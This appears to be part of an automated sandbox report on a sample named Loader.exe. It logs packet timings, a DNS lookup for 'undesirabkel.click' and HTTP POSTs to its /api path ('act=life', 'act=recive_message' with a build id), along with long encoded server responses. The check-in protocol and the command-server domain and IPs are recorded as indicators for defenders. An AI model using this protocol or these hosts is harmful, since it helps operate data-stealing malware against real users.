                                                                                                Dec 27, 2024 23:27:10.199016094 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:11.175981998 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:11.176088095 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:11.176137924 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:11.176238060 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:11.176254988 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:11.622534990 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:11.622595072 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:11.622670889 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:11.622975111 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:11.622988939 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:12.836654902 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:12.836750984 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.009571075 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.009605885 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:13.009979963 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:13.011249065 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.011519909 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.011526108 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:13.770487070 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:13.770585060 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:13.770641088 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.770837069 CET49735443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:13.770853043 CET44349735104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:14.244735003 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:14.244776964 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:14.244908094 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:14.245260000 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:14.245274067 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.838982105 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.839085102 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.840667963 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.840677977 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.840996981 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.849910021 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.850821018 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.850862980 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.850958109 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.850991964 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.851110935 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851170063 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.851294994 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851326942 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.851475954 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851505041 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.851660013 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851690054 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.851718903 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851865053 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.851901054 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.899322033 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.899532080 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.899589062 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.899605989 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.947330952 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.947540045 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.947598934 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.947633028 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:15.995332003 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:15.995485067 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:16.039331913 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:16.316534042 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:18.727063894 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:18.727188110 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:18.727245092 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:18.727444887 CET49737443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:18.727461100 CET44349737104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:18.801692963 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:18.801723003 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:18.801800966 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:18.802165031 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:18.802177906 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.017796993 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.017873049 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.021262884 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.021279097 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.021631002 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.031089067 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.031117916 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.031179905 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.785696983 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.785825014 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.785897970 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.786079884 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.786103010 CET44349741104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:20.786117077 CET49741443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:20.786124945 CET44349741104.21.30.13192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 27, 2024 23:26:57.370527983 CET6472253192.168.2.41.1.1.1
                                                                                                Dec 27, 2024 23:26:57.587225914 CET53647221.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Dec 27, 2024 23:26:57.370527983 CET192.168.2.41.1.1.10x9f8aStandard query (0)undesirabkel.clickA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Dec 27, 2024 23:26:57.587225914 CET1.1.1.1192.168.2.40x9f8aNo error (0)undesirabkel.click104.21.30.13A (IP address)IN (0x0001)false
                                                                                                Dec 27, 2024 23:26:57.587225914 CET1.1.1.1192.168.2.40x9f8aNo error (0)undesirabkel.click172.67.150.49A (IP address)IN (0x0001)false
                                                                                                • undesirabkel.click
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449730104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:26:58 UTC265OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:26:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                Data Ascii: act=life
                                                                                                2024-12-27 22:26:59 UTC1129INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:26:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=imu9qtfg8kn9uc8iti6k2id42l; expires=Tue, 22 Apr 2025 16:13:38 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FioQwkMlEnmcTx7FHoWhK%2BQOkqy4uyVTFp0dtXvcNsYXohp6yy3pyQREGahj%2FYLAxSFXDdhMFN1s5o7UufL28kkNYDvyLalxz1PM6iX0Z9hncAqUaAFb%2FBA6TsfxzhfWKdPLPS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc3f5ceb2369-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1790&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1583514&cwnd=142&unsent_bytes=0&cid=cfabab2d8f34cf10&ts=756&x=0"
                                                                                                2024-12-27 22:26:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                Data Ascii: 2ok
                                                                                                2024-12-27 22:26:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449731104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:00 UTC266OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 54
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:00 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 26 6a 3d
                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--yxojbtuqnnxf&j=
                                                                                                2024-12-27 22:27:01 UTC1125INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=iurop7eqdsqiecp9heodd8rj8e; expires=Tue, 22 Apr 2025 16:13:40 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXTZxCQAQNEruUkh4iunC4hw8IrT1DroDg2dQpP7JH0TrcduSKDX%2FWQtWZYbV9y4RT5cVv6pyuKgQKuu3CBVKLYvwfjIbKfl6ge1GzzFrQjoCnOhtJrXVJy9xcVg8%2ByKXICr3k8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc4bbf0f0f89-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1601&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=956&delivery_rate=1757977&cwnd=235&unsent_bytes=0&cid=0c48fa7b9b66925a&ts=799&x=0"
                                                                                                2024-12-27 22:27:01 UTC244INData Raw: 34 39 31 63 0d 0a 55 42 32 65 39 46 79 6e 63 2b 4e 69 32 55 37 62 70 64 44 35 35 6a 68 51 46 30 79 50 6b 59 47 70 52 71 50 54 72 68 64 61 39 6f 41 72 50 2b 6a 57 5a 70 4e 66 77 52 47 38 62 4f 48 52 6f 6f 79 44 46 48 4a 32 4b 4b 32 72 35 38 67 71 30 4c 61 43 4e 53 79 62 6f 6d 70 37 2f 35 67 76 77 6c 2f 42 42 36 46 73 34 66 36 72 32 34 4e 57 63 69 31 75 36 76 76 6a 79 43 72 42 73 73 56 34 4b 70 72 6a 4f 48 48 35 6e 44 6e 45 46 34 49 4f 74 43 75 2b 77 4c 47 54 69 46 45 39 66 79 47 74 76 61 50 4d 50 49 48 70 6a 46 6f 2f 67 75 45 64 66 4f 32 66 66 74 70 66 6d 45 43 38 49 50 6d 66 38 70 69 44 57 6a 78 78 4b 4f 54 35 36 63 45 69 77 4c 66 45 5a 7a 4f 51 36 44 68 2f 2b 70 30 7a 7a 51 4f 50 42 4c 4d 67 75 4d 71 78 32 38 6f 61 4e 57
                                                                                                Data Ascii: 491cUB2e9Fync+Ni2U7bpdD55jhQF0yPkYGpRqPTrhda9oArP+jWZpNfwRG8bOHRooyDFHJ2KK2r58gq0LaCNSybomp7/5gvwl/BB6Fs4f6r24NWci1u6vvjyCrBssV4KprjOHH5nDnEF4IOtCu+wLGTiFE9fyGtvaPMPIHpjFo/guEdfO2fftpfmEC8IPmf8piDWjxxKOT56cEiwLfEZzOQ6Dh/+p0zzQOPBLMguMqx28oaNW
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 31 75 74 62 4f 77 2b 53 66 51 6f 4e 6c 34 4b 4a 4b 69 4c 54 48 6c 31 6a 6e 4a 55 64 6c 41 73 79 43 33 77 72 47 55 67 31 73 79 5a 79 48 74 38 4f 76 44 49 4d 75 2b 77 33 6f 32 6e 75 55 36 64 76 75 5a 4f 63 30 58 6a 67 50 37 59 76 6e 41 71 74 76 63 47 68 4a 6c 4c 65 37 6e 37 74 70 6b 33 76 2f 56 4e 54 2b 59 6f 6d 6f 2f 2b 70 67 2f 79 42 47 54 43 4c 41 6e 76 4e 57 35 6b 6f 6c 58 4d 6e 67 6b 34 76 44 6a 7a 43 37 4c 76 73 5a 78 4e 5a 6e 6b 4d 6e 2b 38 32 48 37 43 43 63 46 59 2b 77 2b 38 31 37 57 58 6b 68 67 49 4e 54 47 6a 36 71 50 4d 4b 49 48 70 6a 48 30 39 6c 2b 45 35 63 50 2b 65 4e 64 63 52 6b 77 61 32 4b 61 76 42 74 35 57 4f 57 53 42 2f 49 4f 76 77 36 73 41 74 78 4c 62 49 4e 58 62 55 35 53 6f 2f 70 4e 59 66 79 42 71 4e 43 71 77 73 2b 64 6a 38 67 73 52 64 50
                                                                                                Data Ascii: 1utbOw+SfQoNl4KJKiLTHl1jnJUdlAsyC3wrGUg1syZyHt8OvDIMu+w3o2nuU6dvuZOc0XjgP7YvnAqtvcGhJlLe7n7tpk3v/VNT+Yomo/+pg/yBGTCLAnvNW5kolXMngk4vDjzC7LvsZxNZnkMn+82H7CCcFY+w+817WXkhgINTGj6qPMKIHpjH09l+E5cP+eNdcRkwa2KavBt5WOWSB/IOvw6sAtxLbINXbU5So/pNYfyBqNCqws+dj8gsRdP
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 38 37 73 64 6b 6a 2f 48 4c 62 58 6a 4d 6f 68 68 38 36 4a 55 30 68 79 53 43 44 72 55 72 72 34 65 74 31 5a 30 61 4e 58 6c 75 74 62 50 75 79 69 7a 48 6f 38 4e 34 4f 35 72 73 50 58 72 7a 6e 6a 37 46 48 49 51 45 73 43 65 36 79 72 61 4a 6a 6c 6f 36 63 43 2f 6e 2b 61 4f 46 5a 4d 61 70 6a 43 31 34 70 66 55 35 50 63 6d 56 4d 4d 73 57 6c 30 43 6b 59 71 43 48 74 5a 66 45 41 6e 4a 34 4a 75 6a 32 37 4d 6f 75 7a 37 54 47 65 54 43 61 34 53 42 77 2b 4a 59 79 7a 52 75 4d 44 72 38 6b 73 4d 79 35 6e 59 52 62 4f 44 56 67 72 66 54 37 69 33 79 42 68 63 74 35 4e 5a 75 67 42 33 7a 79 6d 44 6e 54 55 5a 35 4f 6f 6d 79 2b 79 2f 4c 44 78 46 59 37 64 53 58 6e 39 2b 50 4d 4b 63 53 79 79 33 59 31 6b 2b 67 38 65 50 69 61 4e 38 67 58 67 51 65 2f 4b 61 76 43 75 35 65 49 47 6e 77 31 4b 66
                                                                                                Data Ascii: 87sdkj/HLbXjMohh86JU0hySCDrUrr4et1Z0aNXlutbPuyizHo8N4O5rsPXrznj7FHIQEsCe6yraJjlo6cC/n+aOFZMapjC14pfU5PcmVMMsWl0CkYqCHtZfEAnJ4Juj27Mouz7TGeTCa4SBw+JYyzRuMDr8ksMy5nYRbODVgrfT7i3yBhct5NZugB3zymDnTUZ5Oomy+y/LDxFY7dSXn9+PMKcSyy3Y1k+g8ePiaN8gXgQe/KavCu5eIGnw1Kf
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 5a 4d 61 39 6a 43 31 34 6e 65 73 67 63 66 4b 66 4d 38 4d 5a 68 67 36 32 4a 37 2f 4d 74 5a 79 43 56 7a 70 34 4b 2b 37 79 35 38 45 32 77 72 72 47 65 44 4c 55 72 48 4a 34 35 4e 5a 6d 68 54 61 4e 4b 61 73 33 71 39 48 79 68 4d 70 44 63 6e 49 69 72 61 75 6a 79 43 76 49 76 73 52 39 4e 35 76 6d 50 48 6e 36 6d 7a 76 4b 47 35 4d 49 74 53 47 79 79 4c 6d 4a 68 46 63 32 65 53 72 6c 2b 4f 6d 4c 61 6f 47 32 31 44 56 67 31 4e 63 2f 63 50 79 56 4b 49 55 4f 7a 78 6e 37 4b 37 57 48 36 74 75 49 56 44 4a 36 49 75 48 34 36 38 6f 6f 7a 37 62 4a 66 44 43 63 38 44 4e 37 39 4a 63 77 79 68 43 46 42 62 34 6f 76 73 4f 30 6c 4d 51 55 63 6e 49 32 72 61 75 6a 35 41 50 30 38 2b 31 50 65 49 75 73 4b 7a 2f 37 6d 6e 36 64 55 59 30 44 74 79 53 32 77 62 75 58 6a 6c 4d 35 65 53 58 70 2f 2b 72
                                                                                                Data Ascii: ZMa9jC14nesgcfKfM8MZhg62J7/MtZyCVzp4K+7y58E2wrrGeDLUrHJ45NZmhTaNKas3q9HyhMpDcnIiraujyCvIvsR9N5vmPHn6mzvKG5MItSGyyLmJhFc2eSrl+OmLaoG21DVg1Nc/cPyVKIUOzxn7K7WH6tuIVDJ6IuH468ooz7bJfDCc8DN79JcwyhCFBb4ovsO0lMQUcnI2rauj5AP08+1PeIusKz/7mn6dUY0DtyS2wbuXjlM5eSXp/+r
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 4d 31 7a 4b 70 50 72 49 48 48 78 6d 54 62 4e 47 49 41 45 76 69 47 2f 79 37 69 61 67 31 51 38 66 57 36 6a 73 2b 54 54 5a 4a 6e 78 37 57 55 6a 68 76 51 2f 58 76 47 5a 66 74 70 66 6d 45 43 38 49 50 6d 66 38 70 4b 57 58 6a 39 6e 4a 2b 72 39 37 4d 67 32 77 4c 7a 48 5a 7a 2b 62 35 6a 56 7a 2b 70 6b 34 78 42 53 4c 44 4c 77 70 73 73 69 2b 32 38 6f 61 4e 57 31 75 74 62 50 4e 77 44 66 57 73 73 4a 2b 4c 6f 2b 69 4c 54 48 6c 31 6a 6e 4a 55 64 6c 41 75 43 65 79 77 37 4b 58 68 46 34 2f 64 54 7a 69 39 4f 54 43 4c 39 4f 37 79 33 49 7a 6e 4f 6b 39 65 65 36 61 4d 4e 63 55 6b 78 4c 37 59 76 6e 41 71 74 76 63 47 67 52 79 50 76 33 77 6f 66 6f 79 77 71 66 48 65 44 54 55 2f 58 78 6d 76 4a 45 79 68 55 6e 42 42 72 51 6c 75 73 69 7a 6b 6f 68 58 4e 33 77 72 37 50 58 6e 77 53 37 42
                                                                                                Data Ascii: M1zKpPrIHHxmTbNGIAEviG/y7iag1Q8fW6js+TTZJnx7WUjhvQ/XvGZftpfmEC8IPmf8pKWXj9nJ+r97Mg2wLzHZz+b5jVz+pk4xBSLDLwpssi+28oaNW1utbPNwDfWssJ+Lo+iLTHl1jnJUdlAuCeyw7KXhF4/dTzi9OTCL9O7y3IznOk9ee6aMNcUkxL7YvnAqtvcGgRyPv3wofoywqfHeDTU/XxmvJEyhUnBBrQlusizkohXN3wr7PXnwS7B
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 66 61 2b 33 4a 34 38 4e 5a 6d 68 52 4b 47 41 37 6f 6d 73 4d 75 39 6e 49 42 49 4f 48 49 38 37 50 4c 6f 78 69 6a 42 76 4d 46 2f 4f 5a 33 76 50 6e 4c 37 6b 54 48 41 55 63 39 41 76 44 54 35 6e 2f 4b 36 69 56 45 2b 4c 6e 53 74 37 4b 33 53 5a 4d 61 39 6a 43 31 34 6c 4f 67 33 64 66 47 56 4d 63 59 44 67 41 61 70 4c 4c 54 4e 6f 4a 47 50 58 7a 39 34 49 2b 37 31 35 63 41 6f 30 37 6a 4d 64 6a 50 55 72 48 4a 34 35 4e 5a 6d 68 54 4b 57 46 72 45 72 74 64 47 35 6d 6f 64 4d 50 32 56 75 6f 37 50 79 7a 44 57 42 36 64 70 6c 4c 35 50 39 66 47 61 38 6b 54 4b 46 53 63 45 47 73 69 71 2b 77 62 79 4a 67 56 77 39 65 69 66 6b 39 2b 76 49 4a 4d 57 31 79 33 41 37 6d 4f 6b 31 66 50 4f 53 4e 38 73 59 6a 6b 44 31 62 4c 37 66 38 73 50 45 65 79 6c 32 49 75 43 7a 2f 49 55 39 67 62 62 41 4e
                                                                                                Data Ascii: fa+3J48NZmhRKGA7omsMu9nIBIOHI87PLoxijBvMF/OZ3vPnL7kTHAUc9AvDT5n/K6iVE+LnSt7K3SZMa9jC14lOg3dfGVMcYDgAapLLTNoJGPXz94I+715cAo07jMdjPUrHJ45NZmhTKWFrErtdG5modMP2Vuo7PyzDWB6dplL5P9fGa8kTKFScEGsiq+wbyJgVw9eifk9+vIJMW1y3A7mOk1fPOSN8sYjkD1bL7f8sPEeyl2IuCz/IU9gbbAN
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 71 50 39 79 64 4b 4d 41 57 6c 30 4b 4f 4c 37 66 4a 74 59 33 45 52 51 30 37 62 75 4c 70 6f 35 4d 64 32 50 48 4c 65 58 6a 4d 6f 69 64 34 2f 4a 45 6b 30 78 61 4e 45 62 41 68 74 65 57 39 6e 4a 4a 5a 50 58 59 2f 35 4c 2f 6f 78 6d 53 50 38 63 74 74 65 4d 79 69 48 58 6a 71 6c 52 48 47 41 49 68 41 39 57 79 2b 30 66 4c 44 78 47 52 79 5a 79 33 39 38 4f 7a 61 47 6f 48 70 31 55 74 34 6e 2f 51 31 62 2f 2b 41 4e 63 67 64 6b 44 37 37 64 4f 32 56 34 4d 6e 57 43 43 30 31 4d 64 4b 39 6f 38 70 6b 6d 59 6a 56 4e 53 37 55 75 6d 41 78 76 49 52 2b 6e 56 48 47 41 36 6b 2b 76 38 53 6b 6d 4d 4e 6b 44 46 49 34 35 2f 54 7a 7a 44 50 4f 38 59 49 31 4e 39 53 36 43 7a 2f 31 6b 53 58 55 42 34 77 51 76 47 79 47 69 66 4b 44 78 41 4a 79 51 43 33 6a 2f 65 54 64 4e 59 79 57 32 6e 38 2f 68 4f
                                                                                                Data Ascii: qP9ydKMAWl0KOL7fJtY3ERQ07buLpo5Md2PHLeXjMoid4/JEk0xaNEbAhteW9nJJZPXY/5L/oxmSP8ctteMyiHXjqlRHGAIhA9Wy+0fLDxGRyZy398OzaGoHp1Ut4n/Q1b/+ANcgdkD77dO2V4MnWCC01MdK9o8pkmYjVNS7UumAxvIR+nVHGA6k+v8SkmMNkDFI45/TzzDPO8YI1N9S6Cz/1kSXUB4wQvGyGifKDxAJyQC3j/eTdNYyW2n8/hO
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 6d 58 4c 4c 47 6f 45 48 71 7a 71 69 69 37 71 59 6e 6b 41 4d 53 77 58 68 39 65 54 52 49 38 65 58 37 44 56 32 31 4f 31 79 4a 38 58 57 64 6f 55 75 7a 30 43 6a 62 4f 47 48 68 35 69 4b 56 44 56 6a 50 36 44 62 77 50 45 65 67 35 33 4c 59 48 71 67 35 53 4a 75 39 35 73 79 68 56 2f 42 42 76 74 30 36 59 6e 79 6e 35 55 61 61 69 56 38 74 71 61 77 6e 48 53 54 72 6f 4a 73 65 49 4b 69 61 69 32 79 31 69 79 46 53 63 46 48 75 44 36 72 77 62 47 4e 68 78 30 4d 53 77 6e 6a 39 4f 4c 64 4e 4e 61 2b 38 6b 73 74 6c 2b 77 38 65 4f 71 48 66 6f 74 52 6a 6b 44 6a 46 66 6d 50 38 71 54 4b 47 69 6f 31 64 71 33 47 34 4d 55 71 78 71 66 64 4f 42 2b 61 35 54 4e 70 37 49 45 78 68 56 2f 42 42 76 74 30 36 34 6e 79 6e 35 55 61 61 69 56 38 74 71 61 77 6e 48 53 54 72 6f 4a 73 65 49 4b 69 61 69 32
                                                                                                Data Ascii: mXLLGoEHqzqii7qYnkAMSwXh9eTRI8eX7DV21O1yJ8XWdoUuz0CjbOGHh5iKVDVjP6DbwPEeg53LYHqg5SJu95syhV/BBvt06Ynyn5UaaiV8tqawnHSTroJseIKiai2y1iyFScFHuD6rwbGNhx0MSwnj9OLdNNa+8kstl+w8eOqHfotRjkDjFfmP8qTKGio1dq3G4MUqxqfdOB+a5TNp7IExhV/BBvt064nyn5UaaiV8tqawnHSTroJseIKiai2
                                                                                                2024-12-27 22:27:01 UTC1369INData Raw: 6c 4f 68 42 36 30 76 2b 59 6e 79 6c 38 51 43 63 6e 51 6b 2f 66 37 73 7a 47 6a 47 71 38 73 31 64 74 54 73 63 69 65 38 6c 7a 54 56 48 49 34 48 39 79 71 33 79 66 4b 45 79 6b 4e 79 59 32 36 31 6f 4b 32 4c 4e 6f 48 70 6a 44 49 37 68 76 41 30 66 4f 71 56 65 66 73 76 72 42 4b 38 50 4c 71 46 67 35 61 41 54 43 64 32 50 75 72 4e 33 65 59 32 78 71 48 50 4e 77 6d 43 34 54 4a 78 2b 39 5a 77 68 51 6e 42 57 50 73 42 71 38 43 69 6d 4d 51 55 63 6e 6c 75 74 62 50 75 32 53 50 52 73 6f 42 79 49 70 4f 69 4c 54 48 6c 31 69 69 46 53 64 4a 4f 2b 7a 37 35 6e 2f 4c 63 69 6c 63 7a 64 69 44 75 34 66 48 4e 4a 39 65 79 69 30 73 47 75 66 41 31 62 2f 2f 55 44 38 67 56 6c 78 57 34 50 4c 37 35 6a 4c 61 57 58 53 4a 32 62 4d 48 30 37 73 63 61 2f 34 62 64 63 69 6a 57 78 44 46 70 2f 39 5a 77
                                                                                                Data Ascii: lOhB60v+Ynyl8QCcnQk/f7szGjGq8s1dtTscie8lzTVHI4H9yq3yfKEykNyY261oK2LNoHpjDI7hvA0fOqVefsvrBK8PLqFg5aATCd2PurN3eY2xqHPNwmC4TJx+9ZwhQnBWPsBq8CimMQUcnlutbPu2SPRsoByIpOiLTHl1iiFSdJO+z75n/LcilczdiDu4fHNJ9eyi0sGufA1b//UD8gVlxW4PL75jLaWXSJ2bMH07sca/4bdcijWxDFp/9Zw


